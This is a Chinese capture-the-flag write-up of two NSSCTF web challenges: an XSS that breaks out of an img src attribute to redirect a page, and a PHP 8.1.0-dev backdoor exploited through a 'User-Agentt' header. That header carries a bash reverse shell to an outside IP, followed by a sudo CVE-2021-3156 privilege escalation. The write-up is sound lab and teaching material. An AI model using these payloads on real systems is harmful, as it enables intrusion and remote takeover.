【Web】NSSCTF Round#18 Basic个人wp(部分)

目录

①门酱想玩什么呢？

②Becomeroot

①门酱想玩什么呢？

先试一下随便给个链接

不能访问远程链接，结合评论区功能，不难联想到xss，只要给个评论区链接让门酱访问就可

我们研究下评论区

从评论区知道，要让门酱玩元梦之星，考虑直接

document.location=”https://ymzx.qq.com/”;

尝试传了发现不能起作用跳转，估计是这些被html实体化了

那咋整呢，题目里还提供了评论插入图片功能

我们就按示例传一下(必须以http://开头，否则不能解析为图片)

链接是插入到了src中，我们可以直接用”>闭合img标签

评论传

http://">document.location="https://ymzx.qq.com/";.png 123 /png

成功重定向到元梦之星官网

bp抓包

获得该条恶意评论链接

http://node1.anna.nssctf.cn:28834/words/" />
 
 
②Becomeroot
 
进来直接告诉我们php版本是8.1.0-dev
 
 
PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客
 
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");
直接反弹shell，发现要提权
GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令
脚本不太好整到靶机上，还是写马连webshell方便点
User-Agentt: zerodiumsystem("echo '
尝试用suid提权插件来整，失败
发现题目提示：
看一下sudo版本
不难找到对应CVE
CVE-2021-3156 sudo权限提升漏洞
GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令脚本传到服务器的/tmp目录下
进行提权，直接rce